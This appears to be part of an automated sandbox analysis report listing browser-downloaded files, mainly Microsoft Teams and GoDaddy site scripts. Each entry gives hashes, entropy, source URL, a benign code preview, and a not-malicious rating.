                                                                                                                                                                                                                          Preview:<!DOCTYPE html><html lang="en-US"><head><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:16,h:16,m" sizes="16x16"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:24,h:24,m" sizes="24x24"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:32,h:32,m" sizes="32x32"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773b1db-e964-4dd6-8fed-45fbfd73ffc5.png/:/rs=w:48,h:48,m" sizes="48x48"/><link rel="icon" href="//img1.wsimg.com/isteam/ip/f987ee28-0d2d-4d49-bb11-834c1995f8b3/favicon/909c1b4d-c97b-4914-b7e0-f39ba802c054/b773
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):91927
                                                                                                                                                                                                                          Entropy (8bit):5.228215185663642
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:1536:+XrMjuTJeXV5/90Nhb149+K2LosaygogyNxzreZ1Wn8BQI0SswV8s+1ibC5YGhFs:SoOtowNxW00
                                                                                                                                                                                                                          MD5:86C7B332C95B8F0D3D5C4C00C0520C7D
                                                                                                                                                                                                                          SHA1:C12156B4AA445E131FA55E572C96F137829F497F
                                                                                                                                                                                                                          SHA-256:429009A6AE8C75F450AA714F2CDB70DF79A0D46D41705EFB30598AFDE0A9813D
                                                                                                                                                                                                                          SHA-512:088A1EA50454765B93AFA30FC8748A5264306D82191B898C335210067B58A5FEF20726028370BDF10DFBA01C46C8BB4F1C9C65AEB63146EBF748F1BB928DC7D3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/990536-9cffaef74a52be40.js
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[990536],{474977:(t,e,a)=>{a.d(e,{R:()=>m});var o=a(519485),i=a(364819),n=a(440320);class s{constructor(t){this.modifier="alt",this.keyMaps=[],this.originalKeyMaps=[],this.commandIdToAreaDescription=new Map,this.isVirtualStrategy=!1,this.keyMaps=[],this.addCommandIdToAreaDescription("ShowShortcuts",["Global"],"shortcut_show_shortcuts","General",!0),this.addCommandIdToAreaDescription("GoToPowerBar",["Global"],"shortcut_open_search","General",!0),this.addCommandIdToAreaDescription("NewChat",["Global"],"shortcut_compose_new","General",!0),this.addCommandIdToAreaDescription("PopoutNewChat",["Global"],"shortcut_pop_out_new_chat","General",t.enableShortcutToOpenNewChatInPopout),this.addCommandIdToAreaDescription("PopoutSelectedChat",["Global"],"shortcut_popout_selected_chat","General"),this.addCommandIdToAreaDescription("OpenLeftRailFilter",["Global"],"shortcut_open_left_rail_filter
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (4451)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):4507
                                                                                                                                                                                                                          Entropy (8bit):5.2603834356899455
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:UQ9n5gyM/BOcyATOjov9o8sKoyOFOCBj+ycWVNqM1q6zqqe0q7dOdQdndqpqJd/X:dGlpvyATOkv9o8poyqL53cWVJwbE6d7P
                                                                                                                                                                                                                          MD5:7E8957E798608B7835B0681550C5AD10
                                                                                                                                                                                                                          SHA1:51C7EBE582DAC764DB4C1AFAA95A62EAC9261F05
                                                                                                                                                                                                                          SHA-256:FAEC63FA9BF35E462C000E650B53D7569FCABE5BA8190B27D2A4B7D25B394EEF
                                                                                                                                                                                                                          SHA-512:44C8DA46DAEB972EE81597079F394E6AB88255F401CF7417EC3A14D7671F8ADE20C1667E63EF892F6CA4D644A400C04FF7C6014DD9926B10EC1BD4034CFFD0D4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/blobby/go/static/radpack/@wsb/guac-widget-shared/lib/components/DynamicFontScaler-6cccd626.js
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/lib/components/DynamicFontScaler-6cccd626.js",["exports","~/c/_rollupPluginBabelHelpers","~/c/dynamicFontScaler"],(function(t,e,n){"use strict";function o(t){let e,{containerId:n,targetId:o,fontSizes:r,maxLines:i,prioritizeDefault:s}=t;if("undefined"==typeof document)return;const a=document.getElementById(n),c=document.getElementById(o);function l(t){return function(t){const e=parseInt(y(t,"padding-left")||0,10),n=parseInt(y(t,"padding-right")||0,10);return t.scrollWidth+e+n}(t)<=a.clientWidth&&function(t){const e=t.offsetHeight,n=parseInt(y(t,"line-height"),10)||1;return Math.floor(e/n)}(t)<=i}function p(t){return parseInt(y(t,"font-size")||0,10)}function d(t){if(1===t.length)return t[0];const e=t.filter(l);if(1===e.length)return e[0];if(!e.length)return function(t){return t.sort(((t,e)=>p(t)-p(e)))[0]}(t);return e.sort(((t,e)=>p(e)-p(t)))[0]}function u(){if(!a||!c||e===window.innerWidth)return;if(c.hasAttribute("data-font-scaled"))return void g();e=win
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (61519)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):61625
                                                                                                                                                                                                                          Entropy (8bit):5.454418996166431
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:J8D47fVcFkRgOtD5Pjh3qEclWu8ioo/KI7wufTgthcPgLe49EnK/EnNckeLEp7OE:J8afVRgOtD5PjV/sUvsDNhdd
                                                                                                                                                                                                                          MD5:5509E16DAC095B6043858286190CB2B9
                                                                                                                                                                                                                          SHA1:45A642B6881F954038F49929D7FD2C5283FB68EE
                                                                                                                                                                                                                          SHA-256:3185557B3131838A753497C1557D544613CEB47D468B233905C139E5496F7B5D
                                                                                                                                                                                                                          SHA-512:C3A866A72C89614C6B8B97439B1DF2FC3DAEBB686B3464711FFAB8360CCDED2122722D2076A0C05EC8F71E448091CCDA3884A2489F6EBB0716EFC5B6AB767BF9
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/2754-d1fd7c89df97899f.js
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[2754],{719156:e=>{var t;!function(e){!function(e){!function(e){e[e.None=0]="None",e[e.Notified=1]="Notified",e[e.Connecting=2]="Connecting",e[e.Connected=3]="Connected",e[e.LocalHold=4]="LocalHold",e[e.RemoteHold=5]="RemoteHold",e[e.Disconnecting=6]="Disconnecting",e[e.Disconnected=7]="Disconnected",e[e.Observing=8]="Observing",e[e.EarlyMedia=9]="EarlyMedia",e[e.InLobby=10]="InLobby",e[e.Preheating=11]="Preheating",e[e.Preheated=12]="Preheated",e[e.Staging=13]="Staging",e[e.NegotiatingEncryption=14]="NegotiatingEncryption",e[e.NegotiatingEncryptionLobby=15]="NegotiatingEncryptionLobby"}(e.CallState||(e.CallState={})),function(e){e[e.Testing=0]="Testing",e[e.MicrosoftWNS=1]="MicrosoftWNS",e[e.MicrosoftWP7NS=2]="MicrosoftWP7NS",e[e.AppleAPN=3]="AppleAPN",e[e.GoogleAGCM=4]="GoogleAGCM",e[e.Hotmail=5]="Hotmail",e[e.GoogleAC2DM=6]="GoogleAC2DM",e[e.Trouter=7]="Trouter",e[e.Griffin=8]="Griffin"
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):359804
                                                                                                                                                                                                                          Entropy (8bit):5.928198594246381
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6144:I8SCaXo5VE5qPaghGP9PGMtUpZZJx1vgLvzrqnLTDSI8QWRQI/uB:IjoO5qPaghGVJtsDP1YLvz0TeI4RQRB
                                                                                                                                                                                                                          MD5:D4BA442D6C0B9E9693F2FFE2EABF24E0
                                                                                                                                                                                                                          SHA1:51A4D9A30317D3E1FCD15F098CF0785EF03E2C83
                                                                                                                                                                                                                          SHA-256:2B06D408FDE428937B1BFC9B0AC6F71A145BD57D56448943E2D9D1B79DDE9C8F
                                                                                                                                                                                                                          SHA-512:46AC420E4C0F37146548C142487CB4C6FB360C8E20E11203670CDEDC8C1A511EAC0BC7806D645EA15587791220CDC55FF726CD7B01191CD5C9442CDDB496E3CD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/integrities-2b06d408fde428937b1b.js
                                                                                                                                                                                                                          Preview:window.__teamsSriHashes = window.__teamsSriHashes || {};.Object.assign(window.__teamsSriHashes, {"253":"sha256-dCHiqHHbT8C54v6xkfBWJOlN4qDwMFHJpfWkbDSMY1I=","304":"sha256-J//Ktvtf9gZAVrJEo4IyxFOJFdIX13HrYBsw84MKZjs=","450":"sha256-ouv3RNGdmdsmy9N5iMOstCZXhW6f6KuOHbHWbPY8IkI=","555":"sha256-1XCNZ4M/VA/Cs3u4YVBW4RmTc7HQPJ1SgO9LNZDEvIE=","563":"sha256-raXXuMyYmSWZXQPzD+XNeAE86PFRjd4Q9vy6YtqBGGw=","693":"sha256-GvVrL7uVpt/8Q8xZj30M05yu7H2cFyk2hnVodDeZuVE=","757":"sha256-eE44F4pLVlEYadEsrIZ4vjkJu3/kIBCnXE70c464NfM=","785":"sha256-ndUNLMoyh/yu1oaMRWfYYOdtJsBtzogJJGB2FT9Xw7w=","818":"sha256-HRQfl5qrrNxSihawrKVl6appBIRSNE+LwsvSW1bgLNc=","906":"sha256-L5gEiGP2s/6usJyzymx28/OI554GDHRFFoa1Zgz27xg=","1079":"sha256-AJb1brTr1NgAtonwrQ7awmQGy7xZxCmmPEjtbTEtBXQ=","1081":"sha256-U9E/bfXdmC09dlSnprdgfmChJBLjtwaHq0ObyMZNOnE=","1170":"sha256-JDhpHtZ6E4OzpC7AkARyf+KbMplq8nJfnZ64M4UwnSQ=","1214":"sha256-FIGgND7SkFJQs87te48T7KbVZ0x5hWUOQPRyJAWo5FU=","1258":"sha256-vZ+JBKqlmK8u03V/tfF86M7gAbjeFWbaZTfqTGaAquE=
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (3043)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):3092
                                                                                                                                                                                                                          Entropy (8bit):5.221416224205306
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:96:/NSXU/vuELNSXtiF7ANSXTJrrBNSXt7X5wqh:VcKncc7ycd3cd5w8
                                                                                                                                                                                                                          MD5:852CBC5322260E00B44F2C682F88B2C7
                                                                                                                                                                                                                          SHA1:BCAF229E6134F43EB5F974C9891E4D16FAF1D344
                                                                                                                                                                                                                          SHA-256:BAE437DBEFE58377D88C9D579DB7C59F4202F3FBF88866D0005FB375BE6B2CD7
                                                                                                                                                                                                                          SHA-512:F031B43F7FA0DA001F71DDCFFE5E322A94C5F1F52F7C4D67D34880243D9D361AC55C0E5001DD004390867CB31E5DEF5D4D9282E6E2ECB9AEC0E880AA5B786BA3
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@widget/LAYOUT/c/bs-loaders-fffeeba5.js",["exports","~/c/bs-index3"],(function(e,a){"use strict";e.B=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).createElement((global.React||guac.react).Fragment,null,(global.React||guac.react).createElement(c,{viewBox:"0 0 44 44",width:"3em",height:"3em",fill:"currentColor"},(global.React||guac.react).createElement("path",{fillRule:"evenodd",d:"M31.968 23H12.032c-.57 0-1.032-.448-1.032-1 0-.553.462-1 1.032-1h19.936c.57 0 1.032.447 1.032 1 0 .552-.462 1-1.032 1"})),(global.React||guac.react).createElement((global.Core||guac["@wsb/guac-widget-core"]).UX.Style,null,a.k.loaderBalance)),style:{"> svg":{animation:"balance 1s infinite cubic-bezier(.62,.06,.33,.79);",transformOrigin:"center"}}},e)},e.C=function(e){const{SVG:c}=(global.Core||guac["@wsb/guac-widget-core"]).UX2.Element;return this.merge({tag:"div",children:(global.React||guac.react).crea
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21556)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):21592
                                                                                                                                                                                                                          Entropy (8bit):5.118279269599776
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:/z+lhnKuowsx9pGxw57yty3eOHenS934osy:JioFP934Y
                                                                                                                                                                                                                          MD5:1C56940A864F144FAE2EB40EE952CB94
                                                                                                                                                                                                                          SHA1:EBFC754CE962A1F9025853F2995B3987F0383D87
                                                                                                                                                                                                                          SHA-256:3C37A4AA3CF6AAAE6921A4B750C0E4F81FD338D6878BE90B0FAF2F921039CB23
                                                                                                                                                                                                                          SHA-512:AEF4B08A01D56BD8855653499B375DB11D8FD7D67C4BCDC74323236BADC47B70DDFEDC14CE89828736C63FFE147BF71C14311580296D41B59F11A3305993ADDD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("tti",[],e):"object"==typeof exports?exports["tti"]=e():t["tti"]=e()}(window,function(){return n=[function(t,e){var n=function(){return this}();try{n=n||Function("return this")()}catch(t){"object"==typeof window&&(n=window)}t.exports=n},function(t,e,n){"use strict";e.__esModule=!0,e.setCustomProperties=e._sendWebVitalsData=e._collectVitals=e.calculateTTI=void 0,n(2);function i(){0<s.timeToInteractive&&setTimeout(function(){window._expDataLayer=window._expDataLayer||[],window._expDataLayer.push({schema:"add_perf",version:"v1",data:window._tccInternal?{type:"pageperf",properties:s,custom_properties:c}:{timing_object:s,is_hard_navigation:!0,custom_properties:c}})},0)}function r(){var t,e,n=(r=0<arguments.length&&void 0!==arguments[0]?arguments[0]:{}).name,r=r.value;s[n]="CLS"===n?r:Math.round(r),"timeToInteractive"===n&&(s.hasOwnProperty("FID")?i():(t=0,e=setInt
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (21556)
                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                          Size (bytes):21592
                                                                                                                                                                                                                          Entropy (8bit):5.118279269599776
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:/z+lhnKuowsx9pGxw57yty3eOHenS934osy:JioFP934Y
                                                                                                                                                                                                                          MD5:1C56940A864F144FAE2EB40EE952CB94
                                                                                                                                                                                                                          SHA1:EBFC754CE962A1F9025853F2995B3987F0383D87
                                                                                                                                                                                                                          SHA-256:3C37A4AA3CF6AAAE6921A4B750C0E4F81FD338D6878BE90B0FAF2F921039CB23
                                                                                                                                                                                                                          SHA-512:AEF4B08A01D56BD8855653499B375DB11D8FD7D67C4BCDC74323236BADC47B70DDFEDC14CE89828736C63FFE147BF71C14311580296D41B59F11A3305993ADDD
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          URL:https://img1.wsimg.com/signals/js/clients/tti/tti.min.js
                                                                                                                                                                                                                          Preview:!function(t,e){"object"==typeof exports&&"object"==typeof module?module.exports=e():"function"==typeof define&&define.amd?define("tti",[],e):"object"==typeof exports?exports["tti"]=e():t["tti"]=e()}(window,function(){return n=[function(t,e){var n=function(){return this}();try{n=n||Function("return this")()}catch(t){"object"==typeof window&&(n=window)}t.exports=n},function(t,e,n){"use strict";e.__esModule=!0,e.setCustomProperties=e._sendWebVitalsData=e._collectVitals=e.calculateTTI=void 0,n(2);function i(){0<s.timeToInteractive&&setTimeout(function(){window._expDataLayer=window._expDataLayer||[],window._expDataLayer.push({schema:"add_perf",version:"v1",data:window._tccInternal?{type:"pageperf",properties:s,custom_properties:c}:{timing_object:s,is_hard_navigation:!0,custom_properties:c}})},0)}function r(){var t,e,n=(r=0<arguments.length&&void 0!==arguments[0]?arguments[0]:{}).name,r=r.value;s[n]="CLS"===n?r:Math.round(r),"timeToInteractive"===n&&(s.hasOwnProperty("FID")?i():(t=0,e=setInt
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (33266)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):33374
                                                                                                                                                                                                                          Entropy (8bit):5.170268480848515
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:JkQajjwCbtihMF2vwh8R5VOdJXLIgqx6fj0K:J9h/vwhOWcgq+R
                                                                                                                                                                                                                          MD5:40832E67D4391FFDB1613F7DB5F33076
                                                                                                                                                                                                                          SHA1:70382211316199F58BC0D3D56C2A98C81849E11D
                                                                                                                                                                                                                          SHA-256:9A525A37F6D2471F7E74B15172D469DAA14C47096827395DDEB769BFE2E4590A
                                                                                                                                                                                                                          SHA-512:707F2BE3C1177E85036AD8163ADA6FBC33F000F83AE80F6F80A5D32D8FB787CE51C6EB129D0541D6D3C2BE7C277985C380A8EDF4B1AD67061019CE266E917FE4
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[337355],{327402:function(t,r){var e,n,o;n=[],void 0===(o="function"==typeof(e=function(){var t=/^v?(?:\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+)(\.(?:[x*]|\d+))?(?:-[\da-z\-]+(?:\.[\da-z\-]+)*)?(?:\+[\da-z\-]+(?:\.[\da-z\-]+)*)?)?)?$/i;function r(t,r){return-1===t.indexOf(r)?t.length:t.indexOf(r)}function e(t){var e=t.replace(/^v/,"").replace(/\+.*$/,""),n=r(e,"-"),o=e.substring(0,n).split(".");return o.push(e.substring(n+1)),o}function n(t){return isNaN(Number(t))?t:Number(t)}function o(r){if("string"!=typeof r)throw new TypeError("Invalid argument expected string");if(!t.test(r))throw new Error("Invalid argument not valid semver ('"+r+"' received)")}function i(t,r){[t,r].forEach(o);for(var i=e(t),s=e(r),c=0;c<Math.max(i.length-1,s.length-1);c++){var u=parseInt(i[c]||0,10),a=parseInt(s[c]||0,10);if(u>a)return 1;if(a>u)return-1}var f=i[i.length-1],l=s[s.length-1];if(f&&l){var p=f.split(".").map(n
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (22028)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):22136
                                                                                                                                                                                                                          Entropy (8bit):5.408588929590394
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:384:B3NqcNsJobwv8blMDkuYMBYcTjlXH8P2WOhCOdf1D71yF7Ju0bTul3cE+w4Ry7Eq:VE4VUv8RMD9YMBYcnlXH8P2WOhCOdf1P
                                                                                                                                                                                                                          MD5:A87E1F75E1BF072B58ED22C7F8DB87A7
                                                                                                                                                                                                                          SHA1:C4FDB0BA7198411E7510008AD2E812F3BB68D462
                                                                                                                                                                                                                          SHA-256:1DC0883980E666CFDB588463571ECC238B750ADD14372B967A18E2C427DAB9F1
                                                                                                                                                                                                                          SHA-512:64CD0292C77ADBDF95568D680F0DCC9B429A30553F6678ACD487D09C63C8E609FE3A043FFDFADD77BD41382D474B3186A57B2009919F7F6A3F1702805A2F4622
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[816410],{816410:function(e){e.exports=function(){"use strict";const{entries:e,setPrototypeOf:t,isFrozen:n,getPrototypeOf:o,getOwnPropertyDescriptor:r}=Object;let{freeze:i,seal:a,create:l}=Object,{apply:c,construct:s}="undefined"!=typeof Reflect&&Reflect;i||(i=function(e){return e}),a||(a=function(e){return e}),c||(c=function(e,t,n){return e.apply(t,n)}),s||(s=function(e,t){return new e(...t)});const u=b(Array.prototype.forEach),m=b(Array.prototype.pop),p=b(Array.prototype.push),f=b(String.prototype.toLowerCase),d=b(String.prototype.toString),h=b(String.prototype.match),g=b(String.prototype.replace),_=b(String.prototype.indexOf),T=b(String.prototype.trim),y=b(Object.prototype.hasOwnProperty),E=b(RegExp.prototype.test),A=S(TypeError);function N(e){return"number"==typeof e&&isNaN(e)}function b(e){return function(t){for(var n=arguments.length,o=new Array(n>1?n-1:0),r=1;r<n;r++)o[r-1]=argument
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (37259)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):37369
                                                                                                                                                                                                                          Entropy (8bit):5.44186127831047
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RqPw6h3wC/T/oAVf/OoMIYR2YdtqoIwjEWusMkMkMDxqtrV9MjIgUeQJ/6o5mzFf:hdcCtD5vPZLdg
                                                                                                                                                                                                                          MD5:859F0790DACEB74144331047EADDC589
                                                                                                                                                                                                                          SHA1:00B8BA88457C522B90BC3C13DA1A446DAC2B6331
                                                                                                                                                                                                                          SHA-256:754EEDCB935A435F0E2D3A886FA674814B1FA5A9458261EC1D4388BBB12ACB81
                                                                                                                                                                                                                          SHA-512:65CAF9C7062C564E8A598A6C80B7C7F146294E038934E79C736A8364763F8AEB5C138B227F1C68ABA8D45DA676A34BC10DC767432D293AEFA8952F4B58BAB729
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[193021],{928380:(e,t,r)=>{var o,n;r.d(t,{sk:()=>o,$n:()=>n,I6:()=>i,Vt:()=>s,UU:()=>a,EJ:()=>c,Rm:()=>l}),function(e){e.CONFIGURATIONS="configurations",e.CONTEXTUAL_NOTIFICATIONS="contextual-notifications",e.END="end",e.HEADER="header",e.IN_APP_NOTIFICATIONS="in-app-notifications",e.MAIN="main",e.MID_NAV="mid-nav",e.MODAL="modal",e.MONITOR="monitor",e.NAV="nav",e.NAV_CONTROLS="nav-controls",e.NOTIFICATIONS="notifications",e.PRE_CACHE="pre-cache",e.START="start",e.SUBNAV="sub-nav",e.TITLE_BAR="title-bar",e.TOASTS="toasts"}(o||(o={})),function(e){e.configurations="configurations",e.contextualNotifications="contextualNotifications",e.end="end",e.header="header",e.inAppNotifications="inAppNotifications",e.main="main",e.midNav="midNav",e.modal="modal",e.monitor="monitor",e.nav="nav",e.navControls="navControls",e.notifications="notifications",e.preCache="preCache",e.start="start",e
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (330)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):390
                                                                                                                                                                                                                          Entropy (8bit):5.206764812811324
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:6:F9o8fAX7s4Bszv4yA5FKJyR8aBzzNWLc3oqcqAdfFwC6emGHr9EJiKWayfAX7A:HGs4Bkv4yA5sy+go9Hf+eTHr+pWOA
                                                                                                                                                                                                                          MD5:C86B7F8224FA45FB1682AC94D8F75AC6
                                                                                                                                                                                                                          SHA1:9561F67AAE74B14702DB79C22F9C7F9E6F3B3239
                                                                                                                                                                                                                          SHA-256:010083B88E95F18CEFDB90796ACCE02073E91FC8DFEFB27A7F5F3F75529E4906
                                                                                                                                                                                                                          SHA-512:B239BAC43D973D0076F4E0C0720906560B0AED76472F50202841B2EABB66C5AD5774E35449007AA2DC3E6A096330AB14D1AA9374645136C89A20B45E4BBDBC52
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:define("@wsb/guac-widget-shared/c/interopRequireDefault-c83974f7.js",["exports","~/c/_commonjsHelpers"],(function(e,o){"use strict";var t=o.c((function(e){e.exports=function(e){return e&&e.__esModule?e:{default:e}},e.exports.__esModule=!0,e.exports.default=e.exports}));e.i=t})),"undefined"!=typeof window&&(window.global=window);.//# sourceMappingURL=interopRequireDefault-c83974f7.js.map.
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (14466), with no line terminators
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):14466
                                                                                                                                                                                                                          Entropy (8bit):5.325793887878328
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:192:UBv1+1sirzkTt/Ta1sirzNjdR1sirzrgFXhFh76cQJ:UBv16ToThqTJlTfgFXhFh76cQJ
                                                                                                                                                                                                                          MD5:79BE1DC904872919ED0832EB24DAC09F
                                                                                                                                                                                                                          SHA1:48EBA2141FBC6B51737BC6091C4C8C6C8BC755B5
                                                                                                                                                                                                                          SHA-256:585E4222AB14A20626250F16584CAACAE44B4CFC0770F9D24EA9EA86E50E4D1C
                                                                                                                                                                                                                          SHA-512:CBF73C3C93864952E8A4FB6BE07DA0A6FDE47D5C631141F981C9A90AEA3DBD37EC08480A93B7B069990AE5EFE9E22E1D59ECCDC804BFA974BF1347647240CFD5
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Preview:"use strict";var sidecarDiagnostics,sidecarChatZeroState,sidecarMeetApp,sidecarTflOnboarding,sidecarUserContext,sidecarI18nContext,sidecarHtmlSanitizerContext,sidecarAriaLiveContext,sidecarFocusManagementContext;(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[150699],{564961:(e,t,r)=>{var i={".":()=>Promise.all([r.e(587200),r.e(918681),r.e(750818),r.e(978582),r.e(733423),r.e(702584),r.e(49586),r.e(367927),r.e(268921),r.e(842549),r.e(459628),r.e(664062),r.e(994444),r.e(35871)]).then((()=>()=>r(431810)))},n=(e,t)=>(r.R=t,t=r.o(i,e)?i[e]():Promise.resolve().then((()=>{throw new Error('Module "'+e+'" does not exist in container.')})),r.R=void 0,t),a=(e,t,i)=>{if(i&&(r.tu=i),r.S){var n="default",a=r.S[n];if(a&&a!==e)throw new Error("Container initialization failed as it has already been initialized with a different share scope");return r.S[n]=e,r.I(n,t)}};r.d(t,{get:()=>n,init:()=>a})}},e=>{e.O(0,[921072],(()=>(564961,e(e.s=564961))));var t
                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (56471)
                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                          Size (bytes):66708
                                                                                                                                                                                                                          Entropy (8bit):5.345935562300363
                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                          SSDEEP:768:RfLoCGFoLS8vvw4xUC/ib7V/Kc5Wd1PuctAINM0GEXOumJ66Kz3pzN/R5HbgI:FN1ZthMG+umJ66KzZJ/R5Hbr
                                                                                                                                                                                                                          MD5:6A67ACFF1A3F4E2A54532B3CC2B918B5
                                                                                                                                                                                                                          SHA1:D23DD0FA34A6A20FFBBC37E02EB01C732CDACE78
                                                                                                                                                                                                                          SHA-256:BFE62365CA52C27C8606936F747299EB61D61714C367A5750B03809CB69EEA8D
                                                                                                                                                                                                                          SHA-512:E833FE1B5E1D36FD0F38E81C6C35948DA9798A675142C900BCCE58346B5C7A81ACBC9E0BB865CB218F4470A9C3F33A0321993384AD81F70276E95EFBDDEAF326
                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                          Reputation:low
